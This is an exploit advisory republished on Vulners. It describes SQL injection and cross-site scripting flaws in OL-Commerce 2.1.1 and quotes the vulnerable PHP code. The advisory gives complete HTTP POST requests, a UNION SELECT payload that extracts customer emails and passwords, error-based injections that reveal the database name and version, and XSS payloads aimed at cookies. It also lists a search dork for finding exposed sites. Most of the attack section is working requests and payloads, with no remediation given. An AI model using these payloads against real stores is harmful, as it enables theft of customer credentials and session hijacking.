Vulners
Lucene search
OL-Commerce 2.1.1 Cross Site Scripting / SQL Injection Vulnerabilities
OL-Commerce v2.1.1 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://sourceforge.net/projects/ol-commerce/?source=directory
.:. Dork : inurl:"affiliate_signup.php" intext:"Mr:"
####################################################################
[1] Multiple Sql Injection
===========================
VULNERABILITY
##############
[I] /affiliate_signup.php
Line 53:
$a_company =
olc_db_prepare_input($_POST['a_company']);
Line 169-175:
$check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) .
"'");
$check_value = olc_db_fetch_array($check_query);
$entry_state_has_zones = ($check_value['total'] > 0);
if ($entry_state_has_zones) {
$zone_query = olc_db_query("select zone_id from " .
TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) . "'
and zone_name = '" . olc_db_input($a_state) . "'");
if (olc_db_num_rows($zone_query) == 1) {
$zone_values = olc_db_fetch_array($zone_query);
#########
EXPLOIT
#########
Type: Post String Mysql Injection
http://localhost/OL-Commerce/affiliate_signup.php
POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629
action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&[email protected]&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&[email protected]
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL
INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3
[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select
group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers--
-
VULNERABILITY
##############
[II] /affiliate_show_banner.php (line 107-120)
if (isset($_GET['ref'])) $affiliate_id = $_GET['ref'];
if (isset($_POST['ref'])) $affiliate_id = $_POST['ref'];
if (isset($_GET['affiliate_banner_id'])) $banner_id =
$_GET['affiliate_banner_id'];
if (isset($_POST['affiliate_banner_id'])) $banner_id =
$_POST['affiliate_banner_id'];
if (isset($_GET['affiliate_pbanner_id'])) $prod_banner_id =
$_GET['affiliate_pbanner_id'];
if (isset($_POST['affiliate_pbanner_id'])) $prod_banner_id =
$_POST['affiliate_pbanner_id'];
if (!empty($banner_id)) {
$is_banner = 'true';
$sql = "select affiliate_banners_image, affiliate_products_id from " .
TABLE_AFFILIATE_BANNERS . " where affiliate_banners_id = " . $banner_id .
" and affiliate_status = 1";
$banner_values = olc_db_query($sql);
#########
EXPLOIT
#########
Type: Double Query
http://localhost/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL
INJECTION]
VULNERABILITY
##############
[III] /create_account.php
Line 75:
$country = olc_db_prepare_input($_POST['country']);
Line 218-219:
$check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" . (int)$country . "'");
$check = olc_db_fetch_array($check_query);
#########
EXPLOIT
#########
Type: Post String Double Query
http://localhost/OL-Commerce/create_account.php
POST /OL-Commerce/create_account.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&[email protected]
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL
INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4
[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
VULNERABILITY
##############
[V] /admin/create_account.php
Line 57:
$entry_country_id = olc_db_prepare_input($_POST['entry_country_id']);
Line 208-209:
$check_query = olc_db_query("select count(*) as total from " .
TABLE_ZONES . " where zone_country_id = '" .
olc_db_input($entry_country_id) . "'");
$check_value = olc_db_fetch_array($check_query);
#########
EXPLOIT
#########
Type: Post String Double Query
http://localhost/OL-Commerce/admin/create_account.php?action=edit
POST /OL-Commerce/admin/create_account.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&[email protected]
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=
[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
[2] Multiple Post Cross Site Scripting
=======================================
[I]http://localhost/OL-Commerce/affiliate_signup.php
POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629
action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&[email protected]&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&[email protected]
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[XSS]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3
[NOTE]
------
a_country=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>
[II]http://localhost/OL-Commerce/admin/create_account.php?action=edit
POST /OL-Commerce/admin/create_account.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&[email protected]
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[XSS]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=
[NOTE]
------
entry_country_id=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>
####################################################################
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jul 2014 00:00Current
7.9High risk
Vulners AI Score7.9